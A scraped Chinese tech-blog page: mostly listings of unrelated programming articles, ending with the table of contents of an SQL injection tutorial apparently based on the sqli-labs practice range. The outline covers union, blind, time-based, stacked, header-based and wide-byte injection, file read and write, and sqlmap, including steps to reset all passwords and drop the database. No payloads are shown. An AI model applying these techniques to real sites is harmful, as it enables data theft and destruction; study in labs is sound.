在MySQL中设置只读实例主要应用于构建高可用性和扩展性的数据库环境，通常是为了分担读取负载或者用于备份和灾难恢复。以下是创建MySQL只读实例并确保数据一致性的基本步骤：1.创建并配置只读实例-主从复制设置-首先，你需要有一个主数据库实例（Master）负责接收所有的写操作。-创建一个或多个从数据库实例（Slave），并将它们配置为主数据库的复制品。这通常通过设置主从复制（Replication
C#中的PLINQ和LINQ的效率对比搬砖的诗人Z C#c#linq 开发语言
PLINQ（ParallelLINQ）和LINQ（LanguageIntegratedQuery）都是.NET框架中的功能，用于对集合进行查询和操作。它们之间的主要区别在于并行处理能力。LINQ:LINQ是一种用于在.NET应用程序中进行数据查询和操作的语言集成功能。它提供了一种统一的方式来查询各种数据源，如集合、数组、XML、数据库等。LINQ是在单线程环境中执行查询操作的，因此对于大型数据集或
Redis和MySQL的数据一致性问题思考爱放火的安小妮 Redis MySQL 思考总结 redis mysql 数据库
Redis和MySQL的数据一致性问题思考最近有在反思自己工作。因为自己这边是面向业务的，而且是和商品数据相关的。所以我平时工作中涉及到的最多的就是MySQL和Redis的数据存储。像我们配置商品是把商品配置到MySQL，但是对外toC接口都是直接读取Redis的。所以自然而然就涉及到MySQL和Redis的数据一致性问题。下面就是聊聊我自己对于这个问题的一个思考吧。有问题或者有更好方案的朋友也希
docker怎么端口映射 Lance_mu docker 容器运维
1、默认固定的端口#Web服务器：WebApache或Nginx通常使用80端口HTTP：80HTTPS：443#数据库服务器MySQL：3306PostgreSQL：5432MongoDB：27017Redis：6379#邮件服务器SMTP：25POP3：110IMAP：143#其他服务SSH：22FTP：21DNS（域名解析）：53代理服务器Squid：3128版本控制系统Git：9418(S
新注册的阿里云账号有哪些优惠？阿里云新用户必看优惠大合集阿里云最新优惠和活动汇总
很多用户看到阿里云各种活动中的云服务器、云数据库、企业邮箱等云产品都仅限新用户购买之后，都纷纷直接注册了阿里云新账号之后购买，其实，阿里云新用户不仅可以优惠购买活动中的各种云产品，还有很多优惠，下面是“阿里云最新优惠和活动汇总”整理汇总的阿里云新用户必看优惠大合集。新注册的阿里云账号在购买活动中的云产品之前，还有免费领云产品通用代金券、抽取无门槛代金券、免费试用云服务器和正式购买云服务器等阿里云产
网络安全（黑客）——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
黑客（网络安全）技术自学30天一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
MyBatis高级面试题-2024 my_styles mybatis java 开发语言面试题
MyBatis的核心组件有哪些？首先第一个是，SqlSessionFactory，它就像是一个会话工厂。它的任务是创建SqlSession对象，这个对象是我们与数据库交互的主要途径。SqlSessionFactory的作用很重要，因为它可以帮我们配置数据库连接信息和事务管理等。一旦这个工厂被建立起来，它就会加载一些必要的配置和映射文件，为后续的数据库操作提供一个可靠的基础。第二个是SqlSessi
SQLite版本3中的文件锁定和并发(七）代码工匠云数据库 SQLite C与c++sqlite c++数据库
返回：SQLite—系列文章目录上一篇：自己编译SQLite或将SQLite移植到新的操作系统（六）下一篇：SQLite—系列文章目录正文：1.0SQLite版本3中的文件锁定和并发SQLite版本3.0.0引入了新的锁定和日志功能旨在提高SQLite版本2的并发性的机制并减少作家的饥饿问题。新机制还允许交易的原子提交涉及多个数据库文件。本文档介绍新的锁定机制。目标受众是想要理解和/或修改的程序员
python转码 Desamond python 开发语言
转码在许多场景中都有应用，以下是一些常见的场景：网页开发：当用户在网页上输入文本时，可能需要将特殊字符（如空格、引号、特殊符号等）进行转码，以防止这些字符对URL或HTML代码产生干扰。文件名处理：在处理文件名时，可能需要将特殊字符进行转码，以避免文件名被错误地解析或显示。数据传输：在数据传输过程中，为了确保数据的完整性和正确性，可能需要将数据中的特殊字符进行转码。数据存储：在数据库或数据存储中，
go-zero处理本地事务年少~年 golang golang 后端
go-zero处理本地事务，sqlx.SqlConn提供了基础的事务机制,官方代码varconnsqlx.SqlConnerr:=conn.TransactCtx(context.Background(),func(ctxcontext.Context,sessionsqlx.Session)error{r,err:=session.ExecCtx(ctx,"insertintouser(id,n
Python | Redis工具类 -拟墨画扇- Python redis 数据库缓存 python
一、需求自动连接Redis数据库，通过连接池处理数据对输出结果进行Log打印并保存到文件二、代码Utils.redisUtils.py#!/usr/bin/envpython#-*-coding:utf-8-*-importredisfromUtils.loggerimportlog"""Redis数据格式(1)字符串|存储形式:key-value:str-存储二进制数据:可以存储任意类型的数据，
数据管理知识体系指南（第二版）-第五章——数据建模和设计-学习笔记键盘上的五花肉数据治理数据库数据仓库数据治理
目录5.1引言5.1.1业务驱动因素5.1.2目标和原则5.1.3基本概念5.2活动5.2.1规划数据建模5.2.2建立数据模型5.2.3审核数据模型5.2.4维护数据模型5.3工具5.3.1数据建模工具5.3.2数据血缘工具5.3.3数据分析工具5.3.4元数据资料库5.3.5数据模型模式5.3.6行业数据模型5.4方法5.4.1命名约定的最佳实践5.4.2数据库设计中的最佳实践5.5数据建模和
项目管理工具最佳实践水岩
各个公司的最佳实践去哪儿jira自定义使用1.jira编号对应git分支命名，后台增加监控程序，新增一个分支，自动解析分支中的jira编号，自动落地到数据库，完成映射2.各个发布系统间信息同步，消息中心（IC）+数据中心（DC）,广播消息加一站式查询，持续集成，推进代码检查质量，分钟级反馈质量检查反思：1.项目管好：针对一线研发人员，简单易用，而不是满足管理层的“统计度量”（...）简化分类字段，
高阶SQL语句（二） www.mcb.com 数据库 mysql
一子查询也被称作内查询或者嵌套查询，是指在一个查询语句里面还嵌套着另一个查询语句。子查询语句是先于主查询语句被执行的，其结果作为外层的条件返回给主查询进行下一步的查询过滤。①子语句可以与主语句所查询的表相同，也可以是不同表②子语句中的sql语句是为了，最后过滤出一个结果集，用于主语句的判断条件③in:将主表和子表关联/连接的语法环境准备：mysql>usekgc_ky35;Readingtable
自学黑客（网络安全）技术——2024最新九九归二 web安全安全学习笔记网络网络安全信息安全
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
Azkaban各种类型的Job编写 __元昊__
一、概述原生的Azkaban支持的plugin类型有以下这些：command：Linuxshell命令行任务gobblin：通用数据采集工具hadoopJava：运行hadoopMR任务java：原生java任务hive：支持执行hiveSQLpig：pig脚本任务spark：spark任务hdfsToTeradata：把数据从hdfs导入TeradatateradataToHdfs：把数据从Te
Python Flask 使用数据库安果移不动 python flask 开发语言
pipinstallflask_sqlalchemy官方文档：Flask-SQLAlchemy—Flask-SQLAlchemyDocumentation(3.1.x)为了不报错也需要导入另外两个库#pipinstallflask_sqlalchemy#pipinstallmysqlclient完整代码importosfromflaskimportFlaskfromflask_sqlalchemy
.NET Core 将实体类转换为 SQL(ORM 映射) 你小子在看什么…… .NET .netcore sqlsugar postgresql
一、环境说明PostgreSQL数据库Npgsql数据库连接库SqlSugarORM框架二、映射流程1、创建数据库：检查指定数据库是否存在，如果不存在则创建数据库。2、初始化SqlSugar实例：使用SqlSugarClient初始化数据库连接配置。3、筛选实体类：根据指定的命名空间和排除条件筛选需要创建表的实体类。4、创建表：使用CodeFirst.InitTables方法创建数据库表。////
第七章索引及执行计划，存储引擎执笔为剑 #MySQL运维篇编辑器 mysql
第七章索引及执行计划，存储引擎1，索引及执行计划1，作用：提供类似书目录的作用，目的是优化查询2，所用的种类（根据算法）B树索引Hash索引R树FulltextGIS3，B树基于不同的查找算法分类介绍B-tree：在范围查询方面提供了更好的性能（>showengines;#存储引擎作用在表上，不同的表可能有不同的存储引擎mysql>select@@default_storage_engine;#查
数据库的魅力：深入探索与应用小黄编程快乐屋数据库
数据库的魅力：深入探索与应用在数字化时代，数据库已经成为信息处理和存储的基石。无论是大型企业还是个人开发者，数据库都是不可或缺的工具。本文将带您深入探索数据库的魅力，了解其基本概念、类型以及应用，并分享一些实用的数据库管理技巧。一、数据库的基本概念数据库，简而言之，就是按照一定规则存储、组织和管理数据的仓库。它可以看作是一个电子化的文件柜，用于存储电子化的文件。这些文件按照特定的数据模型组织起来，
Thinkphp - 详细实现网站系统登录功能，附带 Mysql 数据库设置、Web 前端展示界面、信息校验等（详细代码，即设计过程）王佳斌 +Thinkphp mysql 前端数据库
前言登录功能，是我们几乎开发每个系统都必须的模块。登录功能设计思路，主要包括几个方面。用户输入网址展示登录页面用户输入用户名，密码等点击登录进行信息校验校验通过之后，记录用户登录信息，跳转指定页面用户校验失败，提示失败信息页面目录具体功能实现为了快速搭建可用、美观的页面，我们采用一个比较成熟的前端框架Bootstrap。下面我们到Bootstrap的官网Bootsrap官网下载bootstrap。
设置mysql 数据库和表的编码方式UTF-8 盖盖衍上中间件数据库 mysql oracle
要设置MySQL数据库表和字段的编码方式为UTF-8，可以使用下面的SQL语句：1.设置数据库默认编码为UTF-8：ALTERDATABASEyour_database_nameCHARACTERSETutf8mb4COLLATEutf8mb4_unicode_ci;2.创建表时指定编码为UTF-8：CREATETABLEyour_table_name(column1VARCHAR(100)CHA
【二】【设计模式】建造者模式妖精七七_ 设计模式设计模式建造者模式
建造者模式的引入//C10_1.cpp#include#include"SystemConfig.h"intmain(){SystemConfigconfig("mysql://127.0.0.1/","xiaomu","xiaomumemeda","redis://127.0.0.1/","xiaomuredis","xiaomuredispw","kafka://127.0.0.1","xia
Linux（centos7）部署hive 灯下夜无眠 Linux linux hive 运维 dbeaver hive客户端
前提环境：已部署完hadoop(HDFS、MapReduce、YARN)1、安装元数据服务MySQL切换root用户#更新密钥rpm--importhttps://repo.mysql.com/RPM-GPG-KEY-mysqL-2022#安装Mysqlyum库rpm-Uvhhttp://repo.mysql.com//mysql57-community-release-el7-7.noarch.
kafka-eagle 配置文件修改使用自带的数据库 bright future cheer kafka 数据库分布式
######################################multizookeeper&kafkaclusterlistSettingsprefixedwith‘kafka.eagle.’willbedeprecated,use‘efak.’instead######################################efak.zk.cluster.alias=clu
mysql 常见数据表操作天狼1222 mysql系列 mysql 数据库
前面介绍了数据库表的基本操作。把常用的做一个汇总。时间久了，记不得完整的语法了，再打开一看，就清楚了。1，表操作1，建表+注释CREATETABLEstudent(idINTPRIMARYKEYAUTO_INCREMENTCOMMENT'学号',nameVARCHAR(200)COMMENT'姓名',ageINTCOMMENT'年龄')COMMENT='学生表'2，修改注释--修改表注释-ALTE
JVM StackMapTable 属性的作用及理解 lijingyao8206 jvm 字节码 Class文件 StackMapTable
在Java 6版本之后JVM引入了栈图(Stack Map Table)概念。为了提高验证过程的效率，在字节码规范中添加了Stack Map Table属性，以下简称栈图，其方法的code属性中存储了局部变量和操作数的类型验证以及字节码的偏移量。也就是一个method需要且仅对应一个Stack Map Table。在Java 7版
回调函数调用方法百合不是茶 java
最近在看大神写的代码时,.发现其中使用了很多的回调 ,以前只是在学习的时候经常用到 ,现在写个笔记记录一下代码很简单: MainDemo :调用方法得到方法的返回结果
[时间机器]制造时间机器需要一些材料 comsci 制造
根据我的计算和推测,要完全实现制造一台时间机器,需要某些我们这个世界不存在的物质和材料... 甚至可以这样说,这种材料和物质,我们在反应堆中也无法获得......
开口埋怨不如闭口做事邓集海邓集海做人做事工作
“开口埋怨，不如闭口做事。”不是名人名言，而是一个普通父亲对儿子的训导。但是，因为这句训导，这位普通父亲却造就了一个名人儿子。这位普通父亲造就的名人儿子，叫张明正。　　　　张明正出身贫寒，读书时成绩差，常挨老师批评。高中毕业，张明正连普通大学的分数线都没上。高考成绩出来后，平时开口怨这怨那的张明正，不从自身找原因，而是不停地埋怨自己家庭条件不好、埋怨父母没有给他创造良好的学习环境。　　　　
jQuery插件开发全解析，类级别与对象级别开发 IT独行者 jquery 开发插件　函数
jQuery插件的开发包括两种：一种是类级别的插件开发，即给 jQuery添加新的全局函数，相当于给 jQuery类本身添加方法。 jQuery的全局函数就是属于 jQuery命名空间的函数，另一种是对象级别的插件开发，即给 jQuery对象添加方法。下面就两种函数的开发做详细的说明。 1 、类级别的插件开发类级别的插件开发最直接的理解就是给jQuer
Rome解析Rss 413277409 Rome解析Rss
import java.net.URL; import java.util.List; import org.junit.Test; import com.sun.syndication.feed.synd.SyndCategory; import com.sun.syndication.feed.synd.S
RSA加密解密无量加密解密 rsa
RSA加密解密代码代码有待整理 package com.tongbanjie.commons.util; import java.security.Key; import java.security.KeyFactory; import java.security.KeyPair; import java.security.KeyPairGenerat
linux 软件安装遇到的问题 aichenglong linux 遇到的问题 ftp
1 ftp配置中遇到的问题 500 OOPS: cannot change directory 出现该问题的原因:是SELinux安装机制的问题.只要disable SELinux就可以了修改方法:1 修改/etc/selinux/config 中SELINUX=disabled 2 source /etc
面试心得 alafqq 面试
最近面试了好几家公司。记录下；支付宝，面试我的人胖胖的，看着人挺好的；博彦外包的职位，面试失败；阿里金融，面试官人也挺和善，只不过我让他吐血了。。。由于印象比较深，记录下； 1，自我介绍 2，说下八种基本类型；（算上string。楼主才答了3种，哈哈，string其实不是基本类型，是引用类型） 3，什么是包装类，包装类的优点； 4，平时看过什么书？NND，什么书都没看过。。照样
java的多态性探讨百合不是茶 java
java的多态性是指main方法在调用属性的时候类可以对这一属性做出反应的情况 //package 1; class A{ public void test(){ System.out.println("A"); } } class D extends A{ public void test(){ S
网络编程基础篇之JavaScript-学习笔记 bijian1013 JavaScript
1.documentWrite <html> <head> <script language="JavaScript"> document.write("这是电脑网络学校"); document.close(); </script> </h
探索JUnit4扩展：深入Rule bijian1013 JUnit Rule 单元测试
本文将进一步探究Rule的应用，展示如何使用Rule来替代@BeforeClass，@AfterClass，@Before和@After的功能。在上一篇中提到，可以使用Rule替代现有的大部分Runner扩展，而且也不提倡对Runner中的withBefores()，withAfte
[CSS]CSS浮动十五条规则 bit1129 css
这些浮动规则，主要是参考CSS权威指南关于浮动规则的总结，然后添加一些简单的例子以验证和理解这些规则。 1. 所有的页面元素都可以浮动 2. 一个元素浮动后，会成为块级元素，比如<span>,a, strong等都会变成块级元素 3.一个元素左浮动，会向最近的块级父元素的左上角移动，直到浮动元素的左外边界碰到块级父元素的左内边界；如果这个块级父元素已经有浮动元素停靠了
【Kafka六】Kafka Producer和Consumer多Broker、多Partition场景 bit1129 partition
0.Kafka服务器配置 3个broker 1个topic，6个partition，副本因子是2 2个consumer，每个consumer三个线程并发读取 1. Producer package kafka.examples.multibrokers.producers; import java.util.Properties; import java.util.
zabbix_agentd.conf配置文件详解 ronin47 zabbix 配置文件
Aliaskey的别名，例如 Alias=ttlsa.userid:vfs.file.regexp[/etc/passwd,^ttlsa:.:([0-9]+),,,,\1]，或者ttlsa的用户ID。你可以使用key：vfs.file.regexp[/etc/passwd,^ttlsa:.: ([0-9]+),,,,\1]，也可以使用ttlsa.userid。备注: 别名不能重复，但是可以有多个
java--19.用矩阵求Fibonacci数列的第N项 bylijinnan fibonacci
参考了网上的思路，写了个Java版的： public class Fibonacci { final static int[] A={1,1,1,0}; public static void main(String[] args) { int n=7; for(int i=0;i<=n;i++){ int f=fibonac
Netty源码学习-LengthFieldBasedFrameDecoder bylijinnan java netty
先看看LengthFieldBasedFrameDecoder的官方API http://docs.jboss.org/netty/3.1/api/org/jboss/netty/handler/codec/frame/LengthFieldBasedFrameDecoder.html API举例说明了LengthFieldBasedFrameDecoder的解析机制，如下：实
AES加密解密 chicony 加密解密
AES加解密算法，使用Base64做转码以及辅助加密： package com.wintv.common; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import sun.misc.BASE64Decod
文件编码格式转换 ctrain 编码格式
package com.test; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;
mysql 在linux客户端插入数据中文乱码 daizj mysql 中文乱码
1、查看系统客户端，数据库，连接层的编码查看方法： http://daizj.iteye.com/blog/2174993 进入mysql，通过如下命令查看数据库编码方式： mysql> show variables like 'character_set_%'; +--------------------------+------
好代码是廉价的代码 dcj3sjt126com 程序员读书
长久以来我一直主张：好代码是廉价的代码。当我跟做开发的同事说出这话时，他们的第一反应是一种惊愕，然后是将近一个星期的嘲笑，把它当作一个笑话来讲。当他们走近看我的表情、知道我是认真的时，才收敛一点。当最初的惊愕消退后，他们会用一些这样的话来反驳： “好代码不廉价，好代码是采用经过数十年计算机科学研究和积累得出的最佳实践设计模式和方法论建立起来的精心制作的程序代码。” 我只
Android网络请求库——android-async-http dcj3sjt126com android
在iOS开发中有大名鼎鼎的ASIHttpRequest库，用来处理网络请求操作，今天要介绍的是一个在Android上同样强大的网络请求库android-async-http，目前非常火的应用Instagram和Pinterest的Android版就是用的这个网络请求库。这个网络请求库是基于Apache HttpClient库之上的一个异步网络请求处理库，网络处理均基于Android的非UI线程，通
ORACLE 复习笔记之SQL语句的优化 eksliang SQL优化 Oracle sql语句优化 SQL语句的优化
转载请出自出处：http://eksliang.iteye.com/blog/2097999 SQL语句的优化总结如下 sql语句的优化可以按照如下六个步骤进行：合理使用索引避免或者简化排序消除对大表的扫描避免复杂的通配符匹配调整子查询的性能 EXISTS和IN运算符下面我就按照上面这六个步骤分别进行总结：
浅析：Android 嵌套滑动机制（NestedScrolling） gg163 android 移动开发滑动机制嵌套
谷歌在发布安卓 Lollipop版本之后，为了更好的用户体验，Google为Android的滑动机制提供了NestedScrolling特性 NestedScrolling的特性可以体现在哪里呢？ 比如你使用了Toolbar，下面一个ScrollView，向上滚
使用hovertree菜单作为后台导航 hvt JavaScript jquery .net hovertree asp.net
hovertree是一个jquery菜单插件，官方网址：http://keleyi.com/jq/hovertree/ ，可以登录该网址体验效果。 0.1.3版本：http://keleyi.com/jq/hovertree/demo/demo.0.1.3.htm hovertree插件包含文件： http://keleyi.com/jq/hovertree/css
SVG 教程（二）矩形天梯梦 svg
SVG <rect> SVG Shapes SVG有一些预定义的形状元素，可被开发者使用和操作：矩形 <rect> 圆形 <circle> 椭圆 <ellipse> 线 <line> 折线 <polyline> 多边形 <polygon> 路径 <path>
一个简单的队列 luyulong java 数据结构队列
public class MyQueue { private long[] arr; private int front; private int end; // 有效数据的大小 private int elements; public MyQueue() { arr = new long[10]; elements = 0; front
基础数据结构和算法九：Binary Search Tree sunwinner Algorithm
A binary search tree (BST) is a binary tree where each node has a Comparable key (and an associated value) and satisfies the restriction that the key in any node is larger than the keys in all
项目出现的一些问题和体会 Steven-Walker DAO Web servlet
第一篇博客不知道要写点什么，就先来点近阶段的感悟吧。这几天学了servlet和数据库等知识，就参照老方的视频写了一个简单的增删改查的，完成了最简单的一些功能，使用了三层架构。 dao层完成的是对数据库具体的功能实现，service层调用了dao层的实现方法，具体对servlet提供支持。 &
高手问答：Java老A带你全面提升Java单兵作战能力！ ITeye管理员 java
本期特邀《Java特种兵》作者：谢宇，CSDN论坛ID: xieyuooo 针对JAVA问题给予大家解答，欢迎网友积极提问，与专家一起讨论! 作者简介：淘宝网资深Java工程师，CSDN超人气博主，人称“胖哥”。 CSDN博客地址： http://blog.csdn.net/xieyuooo 作者在进入大学前是一个不折不扣的计算机白痴，曾经被人笑话过不懂鼠标是什么，

渗透测试漏洞原理之---【SQL注入】

文章目录

1、SQL注入原理

1.1、SQL注入原理

1.2、SQL注入危害

1.3、SQL注入分类

1.4、SQL注入漏洞挖掘

1.4.1、注入点判断

1.4.2、主要关注的问题

1.4.3、sql-lib靶场第一关注入点

1.5、知识补充

2、SQL注入基本手法

2.1、联合查询

判断注入类型

判断列数

判断显示位

数据库中的敏感信息

获取管理员账号密码

2.2、报错注入

group by

extractvalue

updatexml

案例演示

2.3、布尔盲注

爆破数据库名

获取库名长度

按位获取数据库名

案例演示

1、确认闭合

2、判断数据库名的长度

3、按位获取数据库名

2.4、延时注入

数据库名的长度

数据库名字

案例演示

1、构造闭合

2、获取版本号长度

3、获取数据库版本号

2.5、堆叠查询

案例演示

1、 以sqli-labs第38关 为例，修改所有用户密码为654321

2、利用堆叠查询删库

3、恢复sqli-labs 环境

3、SQL注入其他情况

3.1、宽字节注入

3.1.1、代码分析

3.1.2、GBK编码

3.1.3、宽字节注入

获取数据库名

获取表名

获取字段

获取数据

3.2、HTTP头部注入

3.2.1、Cookie注入

获取数据库名称

获取表名

获取字段

获取数据

3.2.2、base64注入

判断注入类型

获取数据库名

3.2.3、User-Agent注入

构造闭合

获取数据库

3.2.4、Referer注入

构造 闭合

获取数据库密

4、SQL注入读写文件

4.1、前提交件

4.1.1、权限问题

4.1.2、文件路径

4.1.3、安全选项

4.2、读写文件

4.2.1、读取文件

4.2.2、写入文件

5、SQL注入工具

5.1、sqlmap

5.1.1、安装与更新

5.1.2、使用参数

5.1.3、sqlmap实操

1、以sqli-labs第38关为例，修改所有用户密码为654321

构造闭合